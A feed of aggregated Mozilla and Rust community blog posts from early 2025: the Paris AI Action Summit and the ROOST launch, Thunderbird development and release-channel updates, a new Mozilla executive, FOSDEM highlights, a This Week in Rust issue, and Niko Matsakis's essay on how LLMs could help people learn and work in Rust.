The Mozilla BlogParis AI Action Summit: A milestone for open and Public AI

As we close out the Paris AI Action Summit, one thing is clear: the conversation around open and Public AI is evolving—and gaining real momentum. Just over a year ago at Bletchley Park, open source AI was framed as a risk. In Paris, we saw a major shift. There is now a growing recognition that openness isn’t just compatible with AI safety and advancing public interest AI—it’s essential to it.

We have been vocal supporters of an ecosystem grounded in open competition and trustworthy AI —one where innovation isn’t walled off by dominant players or concentrated in a single geography. Mozilla, therefore, came to this Summit with a clear and urgent message: AI must be open, human-centered, and built for the public good. And across discussions, that message resonated.

Open source AI is entering the conversation in a big way

Two particularly notable moments stood out:

  • European Commission President Ursula von der Leyen spoke about Europe’s “distinctive approach to AI,” emphasizing collaborative, open-source solutions as a path forward.
  • India’s Prime Minister Narendra Modi reinforced this vision, calling for open source AI systems to enhance trust and transparency, reduce bias, and democratize technology.

These aren’t just words. The investments and initiatives announced at this Summit mark a real turning point. From the launch of Current AI, an initial $400M public interest AI partnership supporting open source development, to ROOST, a new nonprofit making AI safety tools open and accessible, to the €109 billion investment in AI computing infrastructure announced by President Macron, the momentum is clear. Add to that strong signals from the EU and India, and this Summit stands out as one of the most positive and proactive international gatherings on AI so far.

At the heart of this is Public AI—the idea that we need infrastructure beyond private, purely profit-driven AI. That means building AI that serves society and promotes true innovation even when it doesn’t fit neatly into short-term business incentives. The conversations in Paris show that we’re making progress, but there’s more work to do.

Looking ahead to the next AI summit

Momentum is building, and we must forge onward. The next AI Summit in India will be a critical moment to review the progress on these announcements and ensure organizations like Mozilla—those fighting for open and Public AI infrastructure—have a seat at the table.

Mozilla is committed to turning this vision into reality—no longer a distant, abstract idea, but a movement already in motion.

A huge thanks to the organizers, partners, and global leaders driving this conversation forward. Let’s keep pushing for AI that serves humanity—not the other way around.

––Mitchell Baker
Chairwoman, Mozilla
Paris AI Action Summit Steering Committee Member

The post Paris AI Action Summit: A milestone for open and Public AI appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderbird Monthly Development Digest – January 2025

Hello again Thunderbird Community! As January drew to a close, the team was closing in on the completion of some important milestones. Additionally, we had scoped work for our main Q1 priorities. Those efforts are now underway and it feels great to cross things off the list and start tackling new challenges.

As always, you can catch up on all of our previous digests and updates.

FOSDEM – Inspiration, collaboration and education

A modest contingent from the Thunderbird team joined our Mozilla counterparts for an educational and inspiring weekend at Fosdem recently. We talked about standards, problems, solutions and everything in between. However, the most satisfying part of the weekend being standing at the Thunderbird booth and hearing the gratitude, suggestions and support from so many users.

With such important discussions among leading voices, we’re keen to help in finding or implementing solutions to some of the meatier topics such as:

  • OAuth 2.0 Dynamic Client Registration Protocol
  • Support for unicode email addresses
  • Support for OpenPGP certification authorities and trust delegation

Exchange Web Services support in Rust

With a reduction in team capacity for part of January, the team was able to complete work on the following tasks that form some of the final stages in our 0.2 release:

  • Folder compaction
  • Saving attachments to disk
  • Download EWS messages in an nsIChannel

Keep track of feature delivery here.

Account Hub

We completed the second and final milestone in the First Time User Experience for email configuration via the enhanced Account Hub over the course of January. Tasks included density and font awareness, refactoring of state management, OAuth prompts, enhanced error handling and more which can be followed via Meta bug & progress tracking. Watch out for this feature being unveiled in daily and beta in the coming weeks!

Global Message Database

With a significant number of the research and prototyping tasks now behind us, the project has taken shape over the course of January with milestones and tasks mapped out. Recent progress has been related to live view, sorting and support for Unicode server and folder names. 

Next up is to finally crack the problem of “non-unique unique IDs” mentioned previously, which is important preparatory groundwork required for a clean database migration. 

In-App Notifications

Phase 2 is now complete, and almost ready for uplift to ESR, pending underlying Firefox dependencies scheduled in early March. Features and user stories in the latest milestone include a cache-control mechanism, a thorough accessibility review, schema changes and the addition of guard rails to limit notification frequency. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

To see things as they land, and help squash early bugs, you can check the pushlog and try running daily. This would be immensely helpful for catching things early.

Toby Pilling
Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – January 2025 appeared first on The Thunderbird Blog.

Niko MatsakisHow I learned to stop worrying and love the LLM

I believe that AI-powered development tools can be a game changer for Rust—and vice versa. At its core, my argument is simple: AI’s ability to explain and diagnose problems with rich context can help people get over the initial bump of learning Rust in a way that canned diagnostics never could, no matter how hard we try. At the same time, rich type systems like Rust’s give AIs a lot to work with, which could be used to help them avoid hallucinations and validate their output. This post elaborates on this premise and sketches out some of the places where I think AI could be a powerful boost.

Perceived learning curve is challenge #1 for Rust

Is Rust good for every project? No, of course not. But it’s absolutely great for some things—specifically, building reliable, robust software that performs well at scale. This is no accident. Rust’s design is intended to surface important design questions (often in the form of type errors) and to give users the control to fix them in whatever way is best.

But this same strength is also Rust’s biggest challenge. Talking to people within Amazon about adopting Rust, perceived complexity and fear of its learning curve is the biggest hurdle. Most people will say, “Rust seems interesting, but I don’t need it for this problem”. And you know, they’re right! They don’t need it. But that doesn’t mean they wouldn’t benefit from it.

One of Rust’s big surprises is that, once you get used to it, it’s “surprisingly decent” at very large number of things beyond what it was designed for. Simple business logic and scripts can be very pleasant in Rust. But the phase “once you get used to it” in that sentence is key, since most people’s initial experience with Rust is confusion and frustration.

Rust likes to tell you no (but it’s for your own good)

Some languages are geared to say yes—that is, given any program, they aim to run it and do something. JavaScript is of course the most extreme example (no semicolons? no problem!) but every language does this to some degree. It’s often quite elegant. Consider how, in Python, you write vec[-1] to get the last element in the list: super handy!

Rust is not (usually) like this. Rust is geared to say no. The compiler is just itching for a reason to reject your program. It’s not that Rust is mean: Rust just wants your program to be as good as it can be. So we try to make sure that your program will do what you want (and not just what you asked for). This is why vec[-1], in Rust, will panic: sure, giving you the last element might be convenient, but how do we know you didn’t have an off-by-one bug that resulted in that negative index?1

But that tendency to say no means that early learning can be pretty frustrating. For most people, the reward from programming comes from seeing their program run—and with Rust, there’s a lot of niggling details to get right before your program will run. What’s worse, while those details are often motivated by deep properties of your program (like data races), the way they are presented is as the violation of obscure rules, and the solution (“add a *”) can feel random.

Once you get the hang of it, Rust feels great, but getting there can be a pain. I heard a great phrase from someone at Amazon to describe this: “Rust: the language where you get the hangover first”.3

AI today helps soften the learning curve

My favorite thing about working at Amazon is getting the chance to talk to developers early in their Rust journey. Lately I’ve noticed an increasing trend—most are using Q Developer. Over the last year, Amazon has been doing a lot of internal promotion of Q Developer, so that in and of itself is no surprise, but what did surprise me a bit is hearing from developers the way that they use it.

For most of them, the most valuable part of Q Dev is authoring code but rather explaining it. They ask it questions like “why does this function take an &T and not an Arc<T>?” or “what happens when I move a value from one place to another?”. Effectively, the LLM becomes an ever-present, ever-patient teacher.4

Scaling up the Rust expert

Some time back I sat down with an engineer learning Rust at Amazon. They asked me about an error they were getting that they didn’t understand. “The compiler is telling me something about ‘static, what does that mean?” Their code looked something like this:

async fn log_request_in_background(message: &str) {
    tokio::spawn(async move {
        log_request(message);
    });
}

And the compiler was telling them:

error[E0521]: borrowed data escapes outside of function
 --> src/lib.rs:2:5
  |
1 |   async fn log_request_in_background(message: &str) {
  |                                      -------  - let's call the lifetime of this reference `'1`
  |                                      |
  |                                      `message` is a reference that is only valid in the function body
2 | /     tokio::spawn(async move {
3 | |         log_request(message);
4 | |     });
  | |      ^
  | |      |
  | |______`message` escapes the function body here
  |        argument requires that `'1` must outlive `'static`

This is a pretty good error message! And yet it requires significant context to understand it (not to mention scrolling horizontally, sheesh). For example, what is “borrowed data”? What does it mean for said data to “escape”? What is a “lifetime” and what does it mean that “'1 must outlive 'static”? Even assuming you get the basic point of the message, what should you do about it?

The fix is easy… if you know what to do

Ultimately, the answer to the engineer’s problem was just to insert a call to clone5. But deciding on that fix requires a surprisingly large amount of context. In order to figure out the right next step, I first explained to the engineer that this confusing error is, in fact, what it feels like when Rust saves your bacon, and talked them through how the ownership model works and what it means to free memory. We then discussed why they were spawning a task in the first place (the answer: to avoid the latency of logging)—after all, the right fix might be to just not spawn at all, or to use something like rayon to block the function until the work is done.

Once we established that the task needed to run asynchronously from its parent, and hence had to own the data, we looked into changing the log_request_in_background function to take an Arc<String> so that it could avoid a deep clone. This would be more efficient, but only if the caller themselves could cache the Arc<String> somewhere. It turned out that the origin of this string was in another team’s code and that this code only returned an &str. Refactoring that code would probably be the best long term fix, but given that the strings were expected to be quite short, we opted to just clone the string.

You can learn a lot from a Rust error

An error message is often your first and best chance to teach somebody something.—Esteban Küber (paraphrased)

Working through this error was valuable. It gave me a chance to teach this engineer a number of concepts. I think it demonstrates a bit of Rust’s promise—the idea that learning Rust will make you a better programmer overall, regardless of whether you are using Rust or not.

Despite all the work we have put into our compiler error messages, this kind of detailed discussion is clearly something that we could never achieve. It’s not because we don’t want to! The original concept for --explain, for example, was to present a customized explanation of each error was tailored to the user’s code. But we could never figure out how to implement that.

And yet tailored, in-depth explanation is absolutely something an LLM could do. In fact, it’s something they already do, at least some of the time—though in my experience the existing code assistants don’t do nearly as good a job with Rust as they could.

What makes a good AI opportunity?

Emery Berger is a professor at UMass Amherst who has been exploring how LLMs can improve the software development experience. Emery emphasizes how AI can help close the gap from “tool to goal”. In short, today’s tools (error messages, debuggers, profilers) tell us things about our program, but they stop there. Except in simple cases, they can’t help us figure out what to do about it—and this is where AI comes in.

When I say AI, I am not talking (just) about chatbots. I am talking about programs that weave LLMs into the process, using them to make heuristic choices or proffer explanations and guidance to the user. Modern LLMs can also do more than just rely on their training and the prompt: they can be given access to APIs that let them query and get up-to-date data.

I think AI will be most useful in cases where solving the problem requires external context not available within the program itself. Think back to my explanation of the 'static error, where knowing the right answer depended on how easy/hard it would be to change other APIs.

Where I think Rust should leverage AI

I’ve thought about a lot of places I think AI could help make working in Rust more pleasant. Here is a selection.

Deciding whether to change the function body or its signature

Consider this code:

fn get_first_name(&self, alias: &str) -> &str {
    alias
}

This function will give a type error, because the signature (thanks to lifetime elision) promises to return a string borrowed from self but actually returns a string borrowed from alias. Now…what is the right fix? It’s very hard to tell in isolation! It may be that in fact the code was meant to be &self.name (in which case the current signature is correct). Or perhaps it was meant to be something that sometimes returns &self.name and sometimes returns alias, in which case the signature of the function was wrong. Today, we take our best guess. But AI could help us offer more nuanced guidance.

Translating idioms from one language to another

People often ask me questions like “how do I make a visitor in Rust?” The answer, of course, is “it depends on what you are trying to do”. Much of the time, a Java visitor is better implemented as a Rust enum and match statements, but there is a time and a place for something more like a visitor. Guiding folks through the decision tree for how to do non-trivial mappings is a great place for LLMs.

Figuring out the right type structure

When I start writing a Rust program, I start by authoring type declarations. As I do this, I tend to think ahead to how I expect the data to be accessed. Am I going to need to iterate over one data structure while writing to another? Will I want to move this data to another thread? The setup of my structures will depend on the answer to these questions.

I think a lot of the frustration beginners feel comes from not having a “feel” yet for the right way to structure their programs. The structure they would use in Java or some other language often won’t work in Rust.

I think an LLM-based assistant could help here by asking them some questions about the kinds of data they need and how it will be accessed. Based on this it could generate type definitions, or alter the definitions that exist.

Complex refactorings like splitting structs

A follow-on to the previous point is that, in Rust, when your data access patterns change as a result of refactorings, it often means you need to do more wholesale updates to your code.6 A common example for me is that I want to split out some of the fields of a struct into a substruct, so that they can be borrowed separately.7 This can be quite non-local and sometimes involves some heuristic choices, like “should I move this method to be defined on the new substruct or keep it where it is?”.

Migrating consumers over a breaking change

When you run the cargo fix command today it will automatically apply various code suggestions to cleanup your code. With the upcoming Rust 2024 edition, cargo fix---edition will do the same but for edition-related changes. All of the logic for these changes is hardcoded in the compiler and it can get a bit tricky.

For editions, we intentionally limit ourselves to local changes, so the coding for these migrations is usually not too bad, but there are some edge cases where it’d be really useful to have heuristics. For example, one of the changes we are making in Rust 2024 affects “temporary lifetimes”. It can affect when destructors run. This almost never matters (your vector will get freed a bit earlier or whatever) but it can matter quite a bit, if the destructor happens to be a lock guard or something with side effects. In practice when I as a human work with changes like this, I can usually tell at a glance whether something is likely to be a problem—but the heuristics I use to make that judgment are a combination of knowing the name of the types involved, knowing something about the way the program works, and perhaps skimming the destructor code itself. We could hand-code these heuristics, but an LLM could do it and better, and if could ask questions if it was feeling unsure.

Now imagine you are releasing the 2.x version of your library. Maybe your API has changed in significant ways. Maybe one API call has been broken into two, and the right one to use depends a bit on what you are trying to do. Well, an LLM can help here, just like it can help in translating idioms from Java to Rust.

I imagine the idea of having an LLM help you migrate makes some folks uncomfortable. I get that. There’s no reason it has to be mandatory—I expect we could always have a more limited, precise migration available.8

Optimize your Rust code to eliminate hot spots

Premature optimization is the root of all evil, or so Donald Knuth is said to have said. I’m not sure about all evil, but I have definitely seen people rathole on microoptimizing a piece of code before they know if it’s even expensive (or, for that matter, correct). This is doubly true in Rust, where cloning a small data structure (or reference counting it) can often make your life a lot simpler. Llogiq’s great talks on Easy Mode Rust make exactly this point. But here’s a question, suppose you’ve been taking this advice to heart, inserting clones and the like, and you find that your program is running kind of slow? How do you make it faster? Or, even worse, suppose that you are trying to turn our network service. You are looking at the blizzard of available metrics and trying to figure out what changes to make. What do you do? To get some idea of what is possible, check out Scalene, a Python profiler that is also able to offer suggestions as well (from Emery Berger’s group at UMass, the professor I talked about earlier).

Diagnose and explain miri and sanitizer errors

Let’s look a bit to the future. I want us to get to a place where the “minimum bar” for writing unsafe code is that you test that unsafe code with some kind of sanitizer that checks for both C and Rust UB—something like miri today, except one that works “at scale” for code that invokes FFI or does other arbitrary things. I expect a smaller set of people will go further, leveraging automated reasoning tools like Kani or Verus to prove statically that their unsafe code is correct9.

From my experience using miri today, I can tell you two things. (1) Every bit of unsafe code I write has some trivial bug or other. (2) If you enjoy puzzling out the occasionally inscrutable error messages you get from Rust, you’re gonna love miri! To be fair, miri has a much harder job—the (still experimental) rules that govern Rust aliasing are intended to be flexible enough to allow all the things people want to do that the borrow checker doesn’t permit. This means they are much more complex. It also means that explaining why you violated them (or may violate them) is that much more complicated.

Just as an AI can help novices understand the borrow checker, it can help advanced Rustaceans understand tree borrows (or whatever aliasing model we wind up adopting). And just as it can make smarter suggestions for whether to modify the function body or its signature, it can likely help you puzzle out a good fix.

Rust’s emphasis on “reliability” makes it a great target for AI

Anyone who has used an LLM-based tool has encountered hallucinations, where the AI just makes up APIs that “seem like they ought to exist”.10 And yet anyone who has used Rust knows that “if it compiles, it works” is true may more often than it has a right to be.11 This suggests to me that any attempt to use the Rust compiler to validate AI-generated code or solutions is going to also help ensure that the code is correct.

AI-based code assistants right now don’t really have this property. I’ve noticed that I kind of have to pick between “shallow but correct” or “deep but hallucinating”. A good example is match statements. I can use rust-analyzer to fill in the match arms and it will do a perfect job, but the body of each arm is todo!. Or I can let the LLM fill them in and it tends to cover most-but-not-all of the arms but it generates bodies. I would love to see us doing deeper integration, so that the tool is talking to the compiler to get perfect answers to questions like “what variants does this enum have” while leveraging the LLM for open-ended questions like “what is the body of this arm”.12

Conclusion

Overall AI reminds me a lot of the web around the year 2000. It’s clearly overhyped. It’s clearly being used for all kinds of things where it is not needed. And it’s clearly going to change everything.

If you want to see examples of what is possible, take a look at the ChatDBG videos published by Emery Berger’s group. You can see how the AI sends commands to the debugger to explore the program state before explaining the root cause. I love the video debugging bootstrap.py, as it shows the AI applying domain knowledge about statistics to debug and explain the problem.

My expectation is that compilers of the future will not contain nearly so much code geared around authoring diagnostics. They’ll present the basic error, sure, but for more detailed explanations they’ll turn to AI. It won’t be just a plain old foundation model, they’ll use RAG techniques and APIs to let the AI query the compiler state, digest what it finds, and explain it to users. Like a good human tutor, the AI will tailor its explanations to the user, leveraging the user’s past experience and intuitions (oh, and in the user’s chosen language).

I am aware that AI has some serious downsides. The most serious to me is its prodigous energy use, but there are also good questions to be asked about the way that training works and the possibility of not respecting licenses. The issues are real but avoiding AI is not the way to solve them. Just in the course of writing this post, DeepSeek was announced, demonstrating that there is a lot of potential to lower the costs of training. As far as the ethics and legality, that is a very complex space. Agents are already doing a lot to get better there, but note also that most of the applications I am excited about do not involve writing code so much as helping people understand and alter the code they’ve written.


  1. We don’t always get this right. For example, I find the zip combinator of iterators annoying because it takes the shortest of the two iterators, which is occasionally nice but far more often hides bugs. ↩︎

  2. The irony, of course, is that AI can help you to improve your woeful lack of tests by auto-generating them based on code coverage and current behavior. ↩︎

  3. I think they told me they heard it somewhere on the internet? Not sure the original source. ↩︎

  4. Personally, the thing I find most annoying about LLMs is the way they are trained to respond like groveling serveants. “Oh, that’s a good idea! Let me help you with that” or “I’m sorry, you’re right I did make a mistake, here is a version that is better”. Come on, I don’t need flattery. The idea is fine but I’m aware it’s not earth-shattering. Just help me already. ↩︎

  5. Inserting a call to clone is actually a bit more subtle than you might think, given the interaction of the async future here. ↩︎

  6. Garbage Collection allows you to make all kinds of refactorings in ownership structure without changing your interface at all. This is convenient, but—as we discussed early on—it can hide bugs. Overall I prefer having that information be explicit in the interface, but that comes with the downside that changes have to be refactored. ↩︎

  7. I also think we should add a feature like View Types to make this less necessary. In this case instead of refactoring the type structure, AI could help by generating the correct type annotations, which might be non-obvious. ↩︎

  8. My hot take here is that if the idea of an LLM doing migrations in your code makes you uncomfortable, you are likely (a) overestimating the quality of your code and (b) underinvesting in tests and QA infrastructure2. I tend to view an LLM like a “inconsistently talented contributor”, and I am perfectly happy having contributors hack away on projects I own. ↩︎

  9. The student asks, “When unsafe code is proven free of UB, does that make it safe?” The master says, “Yes.” The student asks, “And is it then still unsafe?” The master says, “Yes.” Then, a minute later, “Well, sort of.” (We may need new vocabulary.) ↩︎

  10. My personal favorite story of this is when I asked ChatGPT to generate me a list of “real words and their true definition along with 2 or 3 humorous fake definitions” for use in a birthday party game. I told it that “I know you like to hallucinate so please include links where I can verify the real definition”. It generated a great list of words along with plausible looking URLs for merriamwebster.com and so forth—but when I clicked the URLs, they turned out to all be 404s (the words, it turned out, were real—just not the URLs). ↩︎

  11. This is not a unique property of Rust, it is shared by other languages with rich type systems, like Haskell or ML. Rust happens to be the most widespread such language. ↩︎

  12. I’d also like it if the LLM could be a bit less interrupt-y sometimes. Especially when I’m writing type-system code or similar things, it can be distracting when it keeps trying to author stuff it clearly doesn’t understand. I expect this too will improve over time—and I’ve noticed that while, in the beginning, it tends to guess very wrong, over time it tends to guess better. I’m not sure what inputs and context are being fed by the LLM in the background but it’s evident that it can come to see patterns even for relatively subtle things. ↩︎

The Mozilla BlogROOST: Open source AI safety for everyone

Today we want to point to one of the most exciting announcements at the Paris AI summit: the launch of ROOST, a new nonprofit to build AI safety tools for everyone. 

ROOST stands for Robust Open Online Safety Tools, and it’s solving a clear and important problem: many startups, nonprofits, and governments are trying to use AI responsibly every day but they lack access to even the most basic safety tools and resources that are available to large tech companies. This not only puts users at risk but slows down innovation. ROOST has backing from top tech companies and philanthropies alike ensuring that a broad set of stakeholders have a vested stake in its success. This is critical to building accessible, scalable and resilient safety infrastructure all of us need for the AI era. 

What does this mean practically? ROOST is building, open sourcing and maintaining modular building blocks for AI safety, and offering hands-on support by technical experts to enable organizations of all sizes to build and use AI responsibly. With that, organizations can tackle some of the biggest safety challenges such as eliminating child sexual abuse material (CSAM) from AI datasets and models. 

At Mozilla, we’re proud to have helped kickstart this work, providing a small seed grant for the research at Columbia University that eventually turned into ROOST. Why did we invest early? Because we believe the world needs nonprofit public AI organizations that at once complement and serve as a counterpoint to what’s being built inside the big commercial AI labs. ROOST is exactly this kind of organization, with the potential to create the kind of public technology infrastructure the Mozilla, Linux, and Apache foundations developed in the previous era of the internet.

Our support of ROOST is part of a bigger investment in open source AI and safety. 

In October 2023, before the AI Safety Summit in Bletchley Park, Mozilla worked with Professor Camille Francois and Columbia University to publish an open letter that stated  “when it comes to AI Safety and Security, openness is an antidote not a poison.” 

Over 1,800 leading experts and community members signed our letter, which compelled us to start the Columbia Convening series to advance the conversation around AI, openness, and safety. The second Columbia Convening (which was an official event on the road to the French AI Action Summit happening this week), brought together over 45 experts and builders in AI to advance practical approaches to AI safety. This work helped shape some of  the priorities of ROOST and create a community ready to engage with it going forward. We are thrilled to see ROOST emerge from the 100+ leading AI open source organizations we’ve been bringing together the past year. It exemplifies the principles of openness, pluralism, and practicality that unite this growing community. 

Much has changed in the last year. At the Bletchley Park summit, a number of governments and large AI labs had focused the debate on the so-called existential risks of AI — and were proposing limits on open source AI. Just 15 months later, the tide has shifted. With the world gathering at the AI Action Summit in France, countries are embracing openness as a key component of making AI safe in practical development and deployment contexts. This is an important turning point. 

ROOST launches at exactly the right time and in the right place, using this global AI summit to gather a community that will create the practical building blocks we need to enable a safer AI ecosystem. This is the type of work that makes AI safety a field that everyone can shape and improve.

The post ROOST: Open source AI safety for everyone appeared first on The Mozilla Blog.

Mozilla ThunderbirdThunderbird Desktop Release Channel Will Become Default in March 2025

We have an exciting announcement! Starting with the 136.0 release in March 2025, the Thunderbird Desktop Release channel will be the default download.

If you’re not already familiar with the Release channel, it will be a supported alternative to the ESR channel. It will provide monthly major releases instead of annual major releases. This provides several benefits to our users:

  • Frequent Feature Updates: New features will potentially be available each month, versus the annual Extended Support Release (ESR).
  • Smoother Transitions: Moving from one monthly release to the next will be less disruptive than updating between ESR versions.
  • Consistent Bug Fixes: Users will receive all available bug fixes, rather than relying on patch uplifts, as is the case with ESR.

We’ve been publishing monthly releases since 124.0. We added the Thunderbird Desktop Release Channel to the download page on Oct 1st, 2024.

The next step is to make the release channel an officially supported channel and the default download. We don’t expect this step alone to increase the population significantly. We’re exploring additional methods to encourage adoption in the future, such as in-app notifications to invite ESR users to switch.

One of our goals for 2025 is to increase active installations on the release channel to at least 20% of the total installations. At last check, we had 29,543 active installations on the release channel, compared to 20,918 on beta, and 5,941 on daily. The release channel installations currently account for 0.27% of the 10,784,551 total active installations tracked on stats.thunderbird.net.

To support this transition and ensure stability for monthly releases, we’re implementing several process improvements, including:

  • Pre-merge freezes: A 4-day soft code freeze of comm-central before merging into comm-beta. We continue to bake the week-long post-merge freeze of the release channel into the schedule.
  • Pre-merge reviews: We evaluate changes prior to both merges (central to beta and beta to release) where risky changes can be reverted.
  • New uplift template: A new and more thorough uplift template.

For more details on these release process details, please see the Release section of the developer docs.

For more details on scheduling, please see the Thunderbird Releases & Events calendar.

Thank you for your support with this exciting step for Thunderbird. Let’s work together to make the Release channel a success in 2025!

Regards,
Corey

Corey Bryant
Manager, Release Operations | Mozilla Thunderbird

Note: This blog post was taken from Corey’s original announcement at our Thunderbird Planning mailing list

The post Thunderbird Desktop Release Channel Will Become Default in March 2025 appeared first on The Thunderbird Blog.

The Mozilla BlogWelcoming Peter Rojas as Mozilla’s SVP of New Products

Headshot of Peter Rojas, Senior Vice President of New Products at Mozilla, wearing a gray sweater and smiling against a white background.

We’re thrilled to share that Peter Rojas has joined Mozilla Corporation as our new Senior Vice President of New Products. In this role, Peter will lead Mozilla’s endeavors to explore, build and scale new products that align with Mozilla’s greater mission and values. He will report to me and join Mozilla’s steering committee. 

At Mozilla, we are continuing to explore and scale new products that diversify revenue, address evolving consumer needs, and positively impact this new era of the internet. Peter brings a deep well of experience at the intersection of technology, entrepreneurship and product innovation –– expertise that will help Mozilla monetize and expand beyond our flagship browser. His leadership will be instrumental in bringing exciting new products to consumers who value privacy, choice and an open web.

Early in Peter’s career, he co-founded several influential startups, including the consumer technology news and review organization Engadget and the blogging network Weblogs Inc. He was also a founding partner at Betaworks Ventures, where he invested in groundbreaking companies like Rec Room, Hugging Face, Facemoji, and 8th Wall, among others. Several of these companies were later acquired by Niantic, Twitter and Google.

Most recently, Peter led incubations and early-stage explorations as head of product for Meta’s New Product Experimentation (NPE) group. He was also a senior product director for Messenger and Instagram Direct, where he helped tackle some of Meta’s biggest product challenges, including the monetization of Messenger. Peter also served as VP of strategy at AOL, overseeing strategy for AOL’s brand group, and was later promoted to co-director of AOL Alpha, the company’s experimental new product group.

In the past few months, Mozilla has brought on some strong, innovative product leadership, welcoming talent such as Anthony Enzor-DeMeo, Firefox SVP, and Ajit Varma, VP of Firefox Product. I look forward to working closely with Peter and our other new product leaders as Mozilla continues to evolve, offering a range of new products and services that advance our mission.

The post Welcoming Peter Rojas as Mozilla’s SVP of New Products appeared first on The Mozilla Blog.

About:CommunityFOSDEM 2025: A Celebration of Open Source Innovation

Amazing weather at FOSDEM 2025Brussels came alive this weekend as Mozilla joined FOSDEM 2025, Europe’s premier open-source conference. FOSDEM wasn’t just another tech gathering. It is a representation of a vibrant community, open source innovation, and the spirit of collaboration. And we’re proud of being part of this amazing event since its inception.

This year, FOSDEM is celebrating its 25th anniversary. And unlike previous years’ gloomy weather, this year, we were blessed with surprising sunshine, almost as if the universe was applauding a quarter-century of open-source achievements.

As for Mozilla, our presence this year was extra special as we introduced our new brand. Over the weekend, we ran a bingo challenge in Mozilla’s and Thunderbird’s stands, where participants could play to win exclusive Mozilla t-shirts any many more special swag. It was a really fun way to introduce many projects from across pan-Mozilla.

We also showcased a sneak peek of Firefox Nightly’s new tab group feature in the Mozilla booth and gave away 2300 free cookies to participants on Saturday.

Here are some more highlights from our presence this year:

Highlights from Saturday

  • Mozilla engineering manager Marco Casteluccio presented a talk about the usage of LLM’s to support Firefox developers with code review in the main track.
  • Firefox engineer Valentin Gosu also presented a talk in the DNS track about his journey on using the getaddrinfo API in Firefox.
  • Another Firefox engineer who’s working on Firefox Profiler, Nazim Can Altinova also presented a talk in the Web Performance track. It’s also worth mentioning that the Web Performance devroom was co-run by some Mozillians.
  • Danny Colin, one of Mozilla’s active contributors, hosted a WebExtension BoF session featuring representatives from Mozilla Firefox (Rob Wu & Simeon Vincent) and Google Chrome’s extensions team (Oliver Dunk). This was the first time the team ran a Birds Of a Feather session, and it’s very likely that we’re going to do the same next year.
  • Danny Colin also hosted the Community Gathering where old and new contributors got together to discuss the future of Mozilla’s community. It was really nice to have an interactive session like this where all of us can share our perspective, so thank you to all of you who attended the session!

Highlights from Sunday

Mitchell Baker is presenting at FOSDEM 2025

  • Mitchell Baker kicked off Sunday with a keynote session that offered a thought-provoking exploration of Free/Libre Open Source Software (FLOSS) in the age of artificial intelligence and demonstrated how Mozilla plays a role in defining principled approach to AI that prioritizes transparency, ethics, and community-driven innovation. It was a perfect opening for the talks that we presented at the Mozilla devroom later that day.
  • Around the same time as Mitchell’s session, Mozilla engineer Max Inden also delivered a presentation in the Network devroom, showcasing various techniques the Firefox team uses to enhance Firefox performance.
  • Then on the second half on Sunday, we also hosted the Mozilla devroom where we covered a wide range of Mozilla’s latest innovations from Mythbusting to Mozilla’s AI innovations and Firefox developments. Recordings will be available soon at FOSDEM’s website and via our YouTube channel. So stay tuned!

We’re grateful for the enthusiasm, conversations, and curiosity of attendees at FOSDEM 2025. And big thanks to our amazing volunteers and Mozillians for co-hosting our booth and the Mozilla devroom this year.

We sure had a blast, and we can’t wait to see you again next year!

This Week In RustThis Week in Rust 585

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is ratzilla, a library for building terminal-themed web applications with Rust and WebAssembly.

Thanks to Orhun Parmaksız for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

425 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week with performance of primary benchmarks showing no change over all.

Triage done by @rylev. Revision range: f7538506..01e4f19c

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.3% [0.2%, 0.6%] 32
Regressions ❌
(secondary)
0.5% [0.1%, 1.1%] 65
Improvements ✅
(primary)
-0.5% [-1.0%, -0.2%] 17
Improvements ✅
(secondary)
-3.1% [-10.3%, -0.2%] 20
All ❌✅ (primary) 0.0% [-1.0%, 0.6%] 49

5 Regressions, 2 Improvements, 5 Mixed; 6 of them in rollups 49 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-05 - 2025-03-05 🦀

Virtual
Africa
Asia
Europe
North America
South America:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

